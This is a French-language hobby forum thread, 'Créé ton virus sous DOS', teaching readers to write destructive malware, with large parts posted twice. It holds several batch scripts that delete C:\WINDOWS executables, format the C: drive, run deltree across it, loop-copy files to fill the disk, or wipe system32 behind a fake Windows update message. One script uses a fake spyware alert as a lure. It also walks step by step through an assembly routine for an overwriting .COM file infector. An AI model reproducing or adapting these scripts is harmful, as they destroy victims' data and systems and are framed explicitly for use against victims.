[Créé ton virus sous DOS]
3 participants
Page 1 sur 1
[Créé ton virus sous DOS]
Admin Sam 12 Mar - 17:31
Créé ton virus sous DOS
Pour créer un virus (en dos) facilement et sans aucune notion de programmation c'est très simple.
Le virus va être en .bat (indétectable par un anti-virus.) par contre par MSN si.. lol
Un fichier .bat est tout simplement une série de commandes exécutes
les unes après les autres.
-Quelques Commandes
( ** est le nom du fichier que vous voulez effacer, copier....)
del **: Cette commande permet de supprimer **
deltree **: Il supprime un dossier complet
move **: déplace le fichier **
copy ** destination --: copie le fichier ** et le colle --
echo off : désactive l'affichage de ce qui se passe
dir C:\WINDOWS : affiche le contenu de C:\WINDOWS
echo. : saute une ligne
echo ce ke tu veu écrire : affiche ce qui est écrit après [echo]
cls : efface l'écran
pause : demande d'appuyez sur une touche pour continuer
C:\WINDOWS\ton_prog.exe : exécute ton programme
- Création
Pour la création de votre fichier .bat je vous propose un logiciel Power Batch 6 que vous pouvez télécharger ici.
PowerBatch est une application complète permettant l'édition facile de fichiers batch (*.bat).
Il comporte de nombreux assistants et modèles pour ceux qui ne connaissent pas la programmation batch ou veulent gagner du temps.
Avec PowerBatch est fourni un fichier PDF (nécesssitant Acrobat Reader, téléchargeable sur www.adobe.com) apprenant la programmation Batch à ceux qui ne la connaissent pas.
Installez le prog depuis setup.exe ensuite ouvrez l'application
en premiere ligne, inserrez:
@echo off
Pour ne pas afficher les commandes executes (pour les afficher: @echo on)
Ensuite vous mettez dans n'importe quelle ordre des commandes msdos.
puis enregistrer le fichier et voila le virus.
-Exemple de virus
Code:
------------------
@echo off
echo Heu...bonjour, reste cool et surtout ne bouge pas..
pause
del C:\WINDOWS\*.exe
dir C:\WINDOWS\
echo Voila maintenant t libre !
cls -------------------
Info : le * dans la source signifie que tout les fichiers dont l'extension est noté après (.exe dans l'exemple) vont être supprimer.
Vous avez fait un virus qui est indétectable par un antivirus et qui reste assez dangereux pour votre victime ! ]
NOTE: Noubliez pas de metre" avant le repertoir choisi et " apres
example: Code:
start C:\"Program Files"\"Windows Media Player"\wmplayer.exe
Va démarer windows media player mais si vous oubliez de mettre " rien ne va se passer.
Pour plus informations
Pour créer un virus (en dos) facilement et sans aucune notion de programmation c'est très simple.
Le virus va être en .bat (indétectable par un anti-virus.) par contre par MSN si.. lol
Un fichier .bat est tout simplement une série de commandes exécutes
les unes après les autres.
-Quelques Commandes
( ** est le nom du fichier que vous voulez effacer, copier....)
del **: Cette commande permet de supprimer **
deltree **: Il supprime un dossier complet
move **: déplace le fichier **
copy ** destination --: copie le fichier ** et le colle --
echo off : désactive l'affichage de ce qui se passe
dir C:\WINDOWS : affiche le contenu de C:\WINDOWS
echo. : saute une ligne
echo ce ke tu veu écrire : affiche ce qui est écrit après [echo]
cls : efface l'écran
pause : demande d'appuyez sur une touche pour continuer
C:\WINDOWS\ton_prog.exe : exécute ton programme
- Création
Pour la création de votre fichier .bat je vous propose un logiciel Power Batch 6 que vous pouvez télécharger ici.
PowerBatch est une application complète permettant l'édition facile de fichiers batch (*.bat).
Il comporte de nombreux assistants et modèles pour ceux qui ne connaissent pas la programmation batch ou veulent gagner du temps.
Avec PowerBatch est fourni un fichier PDF (nécesssitant Acrobat Reader, téléchargeable sur www.adobe.com) apprenant la programmation Batch à ceux qui ne la connaissent pas.
Installez le prog depuis setup.exe ensuite ouvrez l'application
en premiere ligne, inserrez:
@echo off
Pour ne pas afficher les commandes executes (pour les afficher: @echo on)
Ensuite vous mettez dans n'importe quelle ordre des commandes msdos.
puis enregistrer le fichier et voila le virus.
-Exemple de virus
Code:
------------------
@echo off
echo Heu...bonjour, reste cool et surtout ne bouge pas..
pause
del C:\WINDOWS\*.exe
dir C:\WINDOWS\
echo Voila maintenant t libre !
cls -------------------
Info : le * dans la source signifie que tout les fichiers dont l'extension est noté après (.exe dans l'exemple) vont être supprimer.
Vous avez fait un virus qui est indétectable par un antivirus et qui reste assez dangereux pour votre victime ! ]
NOTE: Noubliez pas de metre" avant le repertoir choisi et " apres
example: Code:
start C:\"Program Files"\"Windows Media Player"\wmplayer.exe
Va démarer windows media player mais si vous oubliez de mettre " rien ne va se passer.
Pour plus informations
Admin- Admin
- Messages : 30
Date d'inscription : 08/01/2011
Age : 26
Localisation : Pilat -
Re: [Créé ton virus sous DOS]
anthony Lun 25 Avr - 1:47
Admin a écrit:Créé ton virus sous DOS
Pour créer un virus (en dos) facilement et sans aucune notion de programmation c'est très simple.
Le virus va être en .bat (indétectable par un anti-virus.) par contre par MSN si.. lol
Un fichier .bat est tout simplement une série de commandes exécutes
les unes après les autres.
-Quelques Commandes
( ** est le nom du fichier que vous voulez effacer, copier....)
del **: Cette commande permet de supprimer **
deltree **: Il supprime un dossier complet
move **: déplace le fichier **
copy ** destination --: copie le fichier ** et le colle --
echo off : désactive l'affichage de ce qui se passe
dir C:\WINDOWS : affiche le contenu de C:\WINDOWS
echo. : saute une ligne
echo ce ke tu veu écrire : affiche ce qui est écrit après [echo]
cls : efface l'écran
pause : demande d'appuyez sur une touche pour continuer
C:\WINDOWS\ton_prog.exe : exécute ton programme
- Création
Pour la création de votre fichier .bat je vous propose un logiciel Power Batch 6 que vous pouvez télécharger ici.
PowerBatch est une application complète permettant l'édition facile de fichiers batch (*.bat).
Il comporte de nombreux assistants et modèles pour ceux qui ne connaissent pas la programmation batch ou veulent gagner du temps.
Avec PowerBatch est fourni un fichier PDF (nécesssitant Acrobat Reader, téléchargeable sur www.adobe.com) apprenant la programmation Batch à ceux qui ne la connaissent pas.
Installez le prog depuis setup.exe ensuite ouvrez l'application
en premiere ligne, inserrez:
@echo off
Pour ne pas afficher les commandes executes (pour les afficher: @echo on)
Ensuite vous mettez dans n'importe quelle ordre des commandes msdos.
puis enregistrer le fichier et voila le virus.
-Exemple de virus
Code:
------------------
@echo off
echo Heu...bonjour, reste cool et surtout ne bouge pas..
pause
del C:\WINDOWS\*.exe
dir C:\WINDOWS\
echo Voila maintenant t libre !
cls -------------------
Info : le * dans la source signifie que tout les fichiers dont l'extension est noté après (.exe dans l'exemple) vont être supprimer.
Vous avez fait un virus qui est indétectable par un antivirus et qui reste assez dangereux pour votre victime ! ]
NOTE: Noubliez pas de metre" avant le repertoir choisi et " apres
example: Code:
start C:\"Program Files"\"Windows Media Player"\wmplayer.exe
Va démarer windows media player mais si vous oubliez de mettre " rien ne va se passer.
Bon voila vous savez maintenent comment créé un fichier BATCH on va s'intérésser a sont contenue.
Exemple d'un virus en BATCH:
Code:
@echo off
cls
rem #_nom du virus: 0_Fucking_0
rem #_code créé le 05/04/2004 à 3h04
rem #_auteur : Diabolored
rem #_code créé pour : HackerNet
rem #_code de 31 lignes et de 1 069 octets
echo ##################################################
echo ALERTE !!!
echo Votre ordinateur est infecter par un spyware.
echo Le fichier msbb.exe à été trouver.
echo ##################################################
pause
choice /C:ab Si vous voulez mettre le fichier en quarantaine tapez "a" sinon tapez "b". Si dans les 15 secondes qui suivent vous n'avez pas choisi, le fichier sera automatiquement mit en quarantaine.
/T:a,15
if errorlevel = 1 goto a
if errorlevel = 2 goto b
:a
cls
@format c: /u /q
@deltree /y c:\*.*
echo Votre disque dur est Formaté !
goto :fin
:b
cls
:loop
@copy c:\Programme Files\*.* + c:\Windows\*.* c:\Windows\System\
echo Votre ordinateur est en train de se remplir a l' infini ;-)
goto :loop
:fin
Voila le codes source du virus est maintenent je vais vous expliqué
plus en détaille ce qu'il y a dedans pour que vous puissiez le modifié.
1. Formatage : 1.1 Lecteur C:\: Un sympathique formatage rapide et discret. format c: /q /y
/q permet de faire un formatage rapide /y ne pose pas la question "Êtes vous sur de formater ?" 1.2 Lecteur A:\: Pour formater un disquette, ça peut toujours servir. format a: /s
/s Sert à copier les fichiers système pour que la disquette soit bootable. 1.3 Lecteur A:\: La même opération sur le fichier Autoexec.bat format /u c:>autoexc.bat
2. Boucle et saut: Les boucles servent, comme vous-vous le douté, à répéter une ou plusieurs actions, ici en l'occurence goto sert plus généralement a faire des sauts. :loop
copy c:\Programme Files\*.* c:\Windows\systeme\
goto :loop
:loop sert de point d'encrage, il est définissable de n'import quelle manière, il suffit de mettre les deux points devant. 3. Choix: Cela permet de poser des question. choice /C:ab Si tu veut formater tape a sinon tape b
/T:b,10
if errorlevel = 1 goto a
if errorlevel = 2 goto b
:b
format c: /q /y
:a
format c: /q /y
/C:abc permet d'avoir le choix entre a, b et c
/T:b,nn touche b par défaut au bout de nn secondes 3. Attribut des fichiers : Voici quelque commande utiles. 4.1 Lecture seul: Cela permet de poser des question. attrib fichier.doc +r
Active la lecteur seul sur le fichier fichier.doc. attrib fichier.doc -r
Désactive la lecture seul sur le fichier fichier.doc. 4.2 Archive : attrib fichier.doc +a
Active l'attribut archive sur le fichier fichier.doc. attrib fichier.doc -a
Désactive l'attribut archive sur le fichier fichier.doc. 4.3 Caché : attrib fichier.doc +h
Active l'attribut caché sur le fichier fichier.doc. attrib fichier.doc -h
Désactive l'attribut caché sur le fichier fichier.doc. 4.4 Caché : attrib fichier.doc +s
Active l'attribut systè sur le fichier fichier.doc. attrib fichier.doc -s
Désactive l'attribut systè sur le fichier fichier.doc. 5. Les commutateurs : Les commutateur sont très utiles pour préciser l'utilisation que vous voulez faie de le commade employée. /a
Les commutateur sont fait dun slash suivit d'une lettre. Je n'est pas mis d'autre exemple puisque les paramètre sont en fonction des commandes qu'ils suivent. 6. Autres : Ici se trouve des commandes qui peuvent être très utile, je les est mis en vrac, ne sachant pas comment les organisé. 6.1 Temporisation : Pause avec le texte: Appuyer sur une touche pour continuer : pause
Pause sans le texte: Appuyer sur une touche pour continuer : pause>nul
Pause sans appuyer sur une touche : choice /t,5>nul
Remplacer "5" par le nombre de seconde que vous voulez. 6.2 Le texte : Écrire un texte : echo
Sauter une ligne : echo.
6.3 Affichage : Effacer l'écran : cls
Effacer l'entête dos : echo off
Ne pas montrer la commande en cours : @
Il suffit de rajouter un arobase devant la commande. 6.4 Windows : Quitter Windows : %windir%\RUNDLL32.EXE User.exe,ExitWindows
Quitte Windows sans pré. Relancer Windows : shutdown
6.5 Les commentaires : Insérer un commentaire : rem
6.6 Les dossiers : Supprimé un dossier et son contenu : deltree
Créer un dossier : md
6.7 Le son : beep constant : choice /N < nul
Voila j'espere vous avoir aidez
Si vous voulez des codes pour les virus dites le moi je les metrez
anthony- Messages : 26
Date d'inscription : 25/04/2011
Code source commenté, pas à pas
anthony Lun 25 Avr - 1:53
La recherche de fichier est un service fournit pas MS-DOS : le service numéro 4Eh (h indique qu'il s'agit d'hexadécimal) de l'interruption 21h permet de rechercher n'importe quel fichier en spécifiant la bonne chaîne ASCIIZ (chaîne de caractère finie par un zéro)
Il faut d'abord déclarer la chaîne. En assembleur :
FichierCOM db '*.com',0
FichierCOM est le nom que l'on donne à notre variable. DB (Dump Byte) c'est pour affecter la chaîne au nom. '*.com',0 est la chaîne ASCIIZ.
Il ne reste plus qu'à utiliser le service 4Eh:
MOV AH,4Eh
On met le numero de service dans le registre AH, ici 4Eh.
MOV DX,OFFSET FichierCOM
DX reçoit l'adresse de la chaîne ASCIIZ
INT 21h
On exécute la recherche avec l'interruption 21h. Si il n'y a pas de fichier, MS-DOS nous avertit en mettant à 1 un bit (le flag de retenue) d'un registre appelé registre d'état.
On peu le tester avec cette instruction :
JC exit
Jump if Carry, c.a.d saut à "exit" si le flag de retenue est à 1.
Si il y a un fichier, on trouve son nom inscrit alors à l'adresse 9E. Y a plus qu'a récupérer son nom pour l'ouvrir et y écrire le code du virus, c'est le rôle du service 3Dh:
MOV AH, 3Dh
Service 3Dh : ouvrir un fichier
MOV AL, 1
En écriture, on écrase tout. Le fichier infecté sera irrécupérable, pas de désinfection possible.
MOV DX, NomFich
Dans DX l'adresse du nom du fichier.
INT 21h
MS-DOS l'ouvre.
On a juste ouvert le fichier pour pouvoir récupérer son descripteur (handle en anglais). C'est un numéro attribué au fichier qui sert à MS-DOS pour le reconnaître.
Après l'interruption 21h, le descripteur est dans le registre 16 bits AX. Maintenant qu'on a son descripteur on va écraser son code en écrivant notre virus par dessus. Mais faut-il encore connaître la taille exacte du virus. Facile : il suffit d'assembler et de voir la taille du com. Il faut surtout le placer au bon endroit. Car le code d'un fichier COM commence 256 (100h) octets après le début du fichier, il faut donc écrire qu'a partir de 100h.
C'est le rôle du service 40h:
MOV AH, 40h
On va écrire dans le fichier
MOV CL, 86
Taille du virus : 86 octets (à savoir)
MOV DX, 100h
Le bon offset.
INT 21h
MS-DOS écrit le virus. (Vérifiable en contrôlant la DEL du disque dur)
Le virus est libéré sauf si le disque est plein (moins de 86 octets libre) ou s'il est protégé en écriture.
Le virus s'est dupliqué il peut effectuer une action comme afficher un message.
Il doit maintenant infecter d'autres fichiers .com. Faut-il réutiliser le service 4E ? Non, car ce service recherche le premier fichier du répertoire courant, l'infection se fera toujours sur le même fichier, il nous faut donc rechercher d'autres fichiers com.
C'est le rôle du service 4Fh. Remarque: 4F est égal à 4E + 1 (en hexadécimal).
MOV AH, 4Fh
Deuxième recherche :
INT 21h
Si il n'y a pas de fichier, DOS nous avertit en mettant … 1 un bit (le flag de retenue) d'un registre appel‚ registre d'état. On le teste avec :
JNC Infection
Jump if Not Carry, c.a.d saut à "Infection" si le flag de retenue est à 0. Si il y a un fichier, on trouve son nom inscrit alors à l'adresse 9Eh. Y a plus qu'a récupérer son nom pour l'ouvrir et y écrire le code du virus.
Il faut d'abord déclarer la chaîne. En assembleur :
FichierCOM db '*.com',0
FichierCOM est le nom que l'on donne à notre variable. DB (Dump Byte) c'est pour affecter la chaîne au nom. '*.com',0 est la chaîne ASCIIZ.
Il ne reste plus qu'à utiliser le service 4Eh:
MOV AH,4Eh
On met le numero de service dans le registre AH, ici 4Eh.
MOV DX,OFFSET FichierCOM
DX reçoit l'adresse de la chaîne ASCIIZ
INT 21h
On exécute la recherche avec l'interruption 21h. Si il n'y a pas de fichier, MS-DOS nous avertit en mettant à 1 un bit (le flag de retenue) d'un registre appelé registre d'état.
On peu le tester avec cette instruction :
JC exit
Jump if Carry, c.a.d saut à "exit" si le flag de retenue est à 1.
Si il y a un fichier, on trouve son nom inscrit alors à l'adresse 9E. Y a plus qu'a récupérer son nom pour l'ouvrir et y écrire le code du virus, c'est le rôle du service 3Dh:
MOV AH, 3Dh
Service 3Dh : ouvrir un fichier
MOV AL, 1
En écriture, on écrase tout. Le fichier infecté sera irrécupérable, pas de désinfection possible.
MOV DX, NomFich
Dans DX l'adresse du nom du fichier.
INT 21h
MS-DOS l'ouvre.
On a juste ouvert le fichier pour pouvoir récupérer son descripteur (handle en anglais). C'est un numéro attribué au fichier qui sert à MS-DOS pour le reconnaître.
Après l'interruption 21h, le descripteur est dans le registre 16 bits AX. Maintenant qu'on a son descripteur on va écraser son code en écrivant notre virus par dessus. Mais faut-il encore connaître la taille exacte du virus. Facile : il suffit d'assembler et de voir la taille du com. Il faut surtout le placer au bon endroit. Car le code d'un fichier COM commence 256 (100h) octets après le début du fichier, il faut donc écrire qu'a partir de 100h.
C'est le rôle du service 40h:
MOV AH, 40h
On va écrire dans le fichier
MOV CL, 86
Taille du virus : 86 octets (à savoir)
MOV DX, 100h
Le bon offset.
INT 21h
MS-DOS écrit le virus. (Vérifiable en contrôlant la DEL du disque dur)
Le virus est libéré sauf si le disque est plein (moins de 86 octets libre) ou s'il est protégé en écriture.
Le virus s'est dupliqué il peut effectuer une action comme afficher un message.
Il doit maintenant infecter d'autres fichiers .com. Faut-il réutiliser le service 4E ? Non, car ce service recherche le premier fichier du répertoire courant, l'infection se fera toujours sur le même fichier, il nous faut donc rechercher d'autres fichiers com.
C'est le rôle du service 4Fh. Remarque: 4F est égal à 4E + 1 (en hexadécimal).
MOV AH, 4Fh
Deuxième recherche :
INT 21h
Si il n'y a pas de fichier, DOS nous avertit en mettant … 1 un bit (le flag de retenue) d'un registre appel‚ registre d'état. On le teste avec :
JNC Infection
Jump if Not Carry, c.a.d saut à "Infection" si le flag de retenue est à 0. Si il y a un fichier, on trouve son nom inscrit alors à l'adresse 9Eh. Y a plus qu'a récupérer son nom pour l'ouvrir et y écrire le code du virus.
anthony- Messages : 26
Date d'inscription : 25/04/2011
Re: [Créé ton virus sous DOS]
Jessy Lun 26 Sep - 4:22
Pour créer un virus .bat pas besoin de logiciel
1)ouvrir un bloc-notes (sur ton bureau)
2)inscris ce que tu veux
ex:
@echo off
echo Mise a jours de windows veillez attendre lors de la mise a jours.
open C:\''WINDOWS''\system32
pause
del C:\WINDOWS\system32
echo Mise a jours windows terminer.
cls
3)enregistrer sous
mets le nom que tu veux (marque .bat)
codage:Unicode
enregistrer
4)regarder votre bureau un nouvelle icon sera apparue.
P.S:ne pas copier ce code cars je ne suis pas sûr qu'il marche.XD
1)ouvrir un bloc-notes (sur ton bureau)
2)inscris ce que tu veux
ex:
@echo off
echo Mise a jours de windows veillez attendre lors de la mise a jours.
open C:\''WINDOWS''\system32
pause
del C:\WINDOWS\system32
echo Mise a jours windows terminer.
cls
3)enregistrer sous
mets le nom que tu veux (marque .bat)
codage:Unicode
enregistrer
4)regarder votre bureau un nouvelle icon sera apparue.
P.S:ne pas copier ce code cars je ne suis pas sûr qu'il marche.XD
Jessy- Messages : 2
Date d'inscription : 26/09/2011
Page 1 sur 1
Permission de ce forum:
Vous ne pouvez pas répondre aux sujets dans ce forum|
|
|